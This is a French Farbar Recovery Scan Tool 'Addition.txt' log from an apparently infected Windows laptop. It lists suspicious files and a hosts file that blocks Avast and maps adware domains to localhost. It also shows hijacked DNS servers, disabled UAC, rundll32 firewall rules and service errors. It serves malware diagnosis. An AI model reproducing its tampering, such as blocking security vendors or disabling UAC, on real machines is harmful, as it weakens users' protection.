2010-06-24 01:21 - 2010-06-24 01:21 - 001102336 _____ () C:\Program Files (x86)\Hewlett-Packard\HP Connection Manager\System.Data.SQLite.dll
2017-03-07 19:18 - 2017-03-07 19:18 - 000582936 _____ () C:\Program Files\ByteFence\rsLggr.exe
2017-12-09 16:44 - 2017-12-09 16:44 - 000516096 _____ () C:\Windows\TEMP\g2CFB.tmp.exe
2017-12-09 16:57 - 2017-12-09 16:57 - 002943360 _____ () C:\Users\C-3PO\Downloads\ZHPDiag3.exe
2017-08-29 10:38 - 2017-08-29 10:38 - 000862720 _____ () C:\Program Files (x86)\jVddbi7Omy\kl.dll
2010-06-24 01:19 - 2010-06-24 01:19 - 000514570 _____ () C:\Program Files (x86)\Hewlett-Packard\HP Connection Manager\sqlite3.dll
2016-07-18 08:32 - 2011-01-13 02:56 - 000058880 ____R () C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IsdiInterop.dll
==================== Alternate Data Streams (Avec liste blanche) =========
(Si un élément est inclus dans le fichier fixlist.txt, seul le flux de données additionnel (ADS - Alternate Data Stream) sera supprimé.)
==================== Mode sans échec (Avec liste blanche) ===================
(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le "AlternateShell" sera restauré.)
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"
==================== Association (Avec liste blanche) ===============
(Si un élément est inclus dans le fichier fixlist.txt, l'élément de Registre sera restauré à la valeur par défaut ou supprimé.)
==================== Internet Explorer sites de confiance/sensibles ===============
(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre.)
==================== Hosts contenu: ==========================
(Si nécessaire, la commande Hosts: peut être incluse dans le fichier fixlist.txt afin de réinitialiser le fichier hosts.)
2009-07-14 03:34 - 2017-12-09 16:34 - 000015502 _____ C:\Windows\system32\Drivers\etc\hosts
127.0.0.1 wemsofts.com
127.0.0.1 bongadoom.com
127.0.0.1 wepcmainsystem.com
127.0.0.1 internalcampaigntargets.com
127.0.0.1 bongadoom.com
127.0.0.1 getthefilenow.com
127.0.0.1 bigpicturepop.com
127.0.0.1 wizzcaster.com
127.0.0.1 bestoffersfortoday.com
127.0.0.1 wepcmainsystem.com
127.0.0.1 agent.wizztrakys.com
127.0.0.1 csdimonetize.com
127.0.0.1 dl.azalee.site
127.0.0.1 titiaredh.com
127.0.0.1 wepcdisplaysystem.com
127.0.0.1 wepcanalyticsystem.com
127.0.0.1 healthydownload.com
127.0.0.1 leading2download.com
127.0.0.1 dwl0.wizzlabs.com
127.0.0.1 dwl1.wizzlabs.com
127.0.0.1 mess1.wizzmonetize.com
127.0.0.1 dl.azalee.site
127.0.0.1 dl.smashdl.com
127.0.0.1 downloadmyhost.com
127.0.0.1 lapapahoster.com
127.0.0.1 gf.tools.avast.com
127.0.0.1 pair.ff.avast.com
127.0.0.1 ipm-provider.ff.avast.com
127.0.0.1 ipm-provider.ff.avast.com
127.0.0.1 ipm-provider.ff.avast.com
Il y a 392 plus de lignes.
==================== Autres zones ============================
(Actuellement, il n'y a pas de correction automatique pour cette section.)
HKU\S-1-5-21-1342067083-540354075-4242860494-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\C-3PO\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 82.163.142.8 - 95.211.158.136
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 0)
Le Pare-feu est activé.
==================== MSCONFIG/TASK MANAGER éléments désactivés ==
==================== RèglesPare-feu (Avec liste blanche) ===============
(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)
FirewallRules: [SPPSVC-In-TCP] => (Allow) %SystemRoot%\system32\sppsvc.exe
FirewallRules: [SPPSVC-In-TCP-NoScope] => (Allow) %SystemRoot%\system32\sppsvc.exe
FirewallRules: [{8C0B5E7D-8900-4300-8AD7-CEF9199DAA9E}] => (Allow) C:\Windows\system32\rundll32.exe
FirewallRules: [{F13C6AAE-F7C7-40A8-B1C0-8DC245259323}] => (Allow) C:\Users\C-3PO\AppData\Local\Chromium\Application\chrome.exe
FirewallRules: [{B078CC0B-4227-439C-89EC-905E5AD88ACF}] => (Allow) C:\Users\C-3PO\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe
FirewallRules: [{1D3610F3-8E4E-4896-9623-A469497AE236}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{10C04D03-0B30-4F50-A663-91344AA412A4}] => (Allow) C:\Windows\System32\rundll32.exe
FirewallRules: [{11D9F36B-80A1-4FE1-A6A3-E03057094E3F}] => (Allow) C:\Windows\System32\rundll32.exe
FirewallRules: [{F49BD9D4-5153-4D98-9266-9DDBEC3B6138}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe
FirewallRules: [{B4EA3574-312E-4859-AFB2-97E2AD088264}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe
FirewallRules: [{F6CD6BF6-86DA-4893-B2AE-B5EB4A2BD017}] => (Allow) C:\Windows\System32\rundll32.exe
FirewallRules: [{235CCAB7-0768-47B5-869C-9060E7EE9D96}] => (Allow) C:\Windows\System32\rundll32.exe
==================== Points de restauration =========================
==================== Éléments en erreur du Gestionnaire de périphériques =============
Name: Teredo Tunneling Pseudo-Interface
Description: Microsoft Teredo Tunneling Adapter
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: Microsoft
Service: tunnel
Problem: : This device cannot start. (Code10)
Resolution: Device failed to start. Click "Update Driver" to update the drivers for this device.
On the "General Properties" tab of the device, click "Troubleshoot" to start the troubleshooting wizard.
==================== Erreurs du Journal des événements: =========================
Erreurs Application:
==================
Error: (12/09/2017 05:51:49 PM) (Source: Validity USDK) (EventID: 40) (User: )
Description: SSL alert by host: Description is: 47.
Error: (12/09/2017 04:58:35 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3011) (User: AUTORITE NT)
Description: Le déchargement des chaînes de compteurs de performances pour le service WmiApRpl (WmiApRpl) a échoué. Le premier DWORD de la section Data contient le code d’erreur.
Error: (12/09/2017 04:58:35 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3012) (User: AUTORITE NT)
Description: Les chaînes de performance dans la valeur de Registre Performance sont endommagées lors du traitement du fournisseur de compteurs d’extension Performance. La valeur BaseIndex à partir du Registre de performance est le premier DWORD dans la section Données, la valeur LastCounter est le deuxième DWORD dans la section Données, et la valeur LastHelp est le troisième DWORD dans la section Données.
Error: (12/09/2017 04:58:35 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3012) (User: AUTORITE NT)
Description: Les chaînes de performance dans la valeur de Registre Performance sont endommagées lors du traitement du fournisseur de compteurs d’extension Performance. La valeur BaseIndex à partir du Registre de performance est le premier DWORD dans la section Données, la valeur LastCounter est le deuxième DWORD dans la section Données, et la valeur LastHelp est le troisième DWORD dans la section Données.
Error: (12/09/2017 04:55:46 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nom de l’application défaillante mbam.exe, version : 3.0.0.1284, horodatage : 0x5a15ab42
Nom du module défaillant : Qt5Core.dll, version : 5.6.2.0, horodatage : 0x59a63e00
Code d’exception : 0xc0000005
Décalage d’erreur : 0x001aa3b6
ID du processus défaillant : 0x1404
Heure de début de l’application défaillante : 0x01d371062cce062c
Chemin d’accès de l’application défaillante : C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe
Chemin d’accès du module défaillant: C:\Program Files\Malwarebytes\Anti-Malware\Qt5Core.dll
ID de rapport : 6abb5332-dcf9-11e7-967a-402cf4cbb067
Error: (12/09/2017 04:55:41 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nom de l’application défaillante mbam.exe, version : 3.0.0.1284, horodatage : 0x5a15ab42
Nom du module défaillant : Qt5Core.dll, version : 5.6.2.0, horodatage : 0x59a63e00
Code d’exception : 0xc0000005
Décalage d’erreur : 0x001aa3b6
ID du processus défaillant : 0x6b8
Heure de début de l’application défaillante : 0x01d3710629baab63
Chemin d’accès de l’application défaillante : C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe
Chemin d’accès du module défaillant: C:\Program Files\Malwarebytes\Anti-Malware\Qt5Core.dll
ID de rapport : 67ee2930-dcf9-11e7-967a-402cf4cbb067
Error: (12/09/2017 04:54:50 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3011) (User: AUTORITE NT)
Description: Le déchargement des chaînes de compteurs de performances pour le service WmiApRpl (WmiApRpl) a échoué. Le premier DWORD de la section Data contient le code d’erreur.
Error: (12/09/2017 04:54:50 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3012) (User: AUTORITE NT)
Description: Les chaînes de performance dans la valeur de Registre Performance sont endommagées lors du traitement du fournisseur de compteurs d’extension Performance. La valeur BaseIndex à partir du Registre de performance est le premier DWORD dans la section Données, la valeur LastCounter est le deuxième DWORD dans la section Données, et la valeur LastHelp est le troisième DWORD dans la section Données.
Error: (12/09/2017 04:54:50 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3012) (User: AUTORITE NT)
Description: Les chaînes de performance dans la valeur de Registre Performance sont endommagées lors du traitement du fournisseur de compteurs d’extension Performance. La valeur BaseIndex à partir du Registre de performance est le premier DWORD dans la section Données, la valeur LastCounter est le deuxième DWORD dans la section Données, et la valeur LastHelp est le troisième DWORD dans la section Données.
Error: (12/09/2017 04:53:28 PM) (Source: System Restore) (EventID: 8193) (User: )
Description: Échec de la création d’un point de restauration (Processus = C:\Windows\system32\DrvInst.exe "4" "0" "C:\Users\C-3PO\AppData\Local\Temp\{77abfab4-5fe9-39d2-0a82-1d1e434f3821}\seratousb.inf" "9" "655f5abc7" "00000000000004BC" "WinSta0\Default" "000000000000065C" "208" "c:\program files (x86)\serato\drivers\vista64\sl1" ; Description = Installation du package de pilotes : Cristalink Ltd Contrôleurs de bus USB ; Erreur = 0x80070422).
Erreurs système:
=============
Error: (12/09/2017 04:34:43 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Le service xy8EGwcCsXnF Updater n’a pas pu démarrer en raison de l’erreur :
Le fichier spécifié est introuvable.
Error: (12/09/2017 04:34:43 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Le service Windows Recover n’a pas pu démarrer en raison de l’erreur :
Le fichier spécifié est introuvable.
Error: (12/09/2017 04:34:18 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Le service Background Logic Handler n’a pas pu démarrer en raison de l’erreur :
Le fichier spécifié est introuvable.
Error: (12/09/2017 04:33:10 PM) (Source: Service Control Manager) (EventID: 7043) (User: )
Description: Le service Windows Update ne s’est pas fermé correctement après avoir reçu une commande d’anticipation de fermeture.
Error: (12/09/2017 04:32:31 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: Le serveur {51FA2736-5DEE-11D4-98E8-006008BF430C} ne s’est pas enregistré sur DCOM avant la fin du temps imparti.
Error: (12/09/2017 03:22:48 PM) (Source: Service Control Manager) (EventID: 7011) (User: )
Description: Le dépassement de délai (60000 millisecondes) a été atteint lors de l’attente de la réponse transactionnelle du service 8c023e14d62cc32fcaee500b3f1fb4dd.
Error: (12/09/2017 03:21:48 PM) (Source: Service Control Manager) (EventID: 7011) (User: )
Description: Le dépassement de délai (60000 millisecondes) a été atteint lors de l’attente de la réponse transactionnelle du service 8c023e14d62cc32fcaee500b3f1fb4dd.
Error: (12/09/2017 03:17:10 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Le service xy8EGwcCsXnF Updater n’a pas pu démarrer en raison de l’erreur :
Le fichier spécifié est introuvable.
Error: (12/09/2017 03:17:10 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Le service Windows Recover n’a pas pu démarrer en raison de l’erreur :
Le fichier spécifié est introuvable.
Error: (12/09/2017 03:16:31 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Le service Background Logic Handler n’a pas pu démarrer en raison de l’erreur :
Le fichier spécifié est introuvable.
==================== Infos Mémoire ===========================
Processeur: Intel(R) Core(TM) i5-2450M CPU @ 2.50GHz
Pourcentage de mémoire utilisée: 78%
Mémoire physique - RAM - totale: 4030.36 MB
Mémoire physique - RAM - disponible: 854.8 MB
Mémoire virtuelle totale: 8058.89 MB
Mémoire virtuelle disponible: 2830.03 MB
==================== Lecteurs ================================
Drive c: () (Fixed) (Total:292.99 GB) (Free:230.21 GB) NTFS
Drive d: (HP_TOOLS) (Fixed) (Total:4.99 GB) (Free:4.99 GB) FAT32
==================== MBR & Table des partitions ==================
========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 298.1 GB) (Disk ID: E3FB0C75)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=293 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=5 GB) - (Type=0C)
==================== Fin de Addition.txt ============================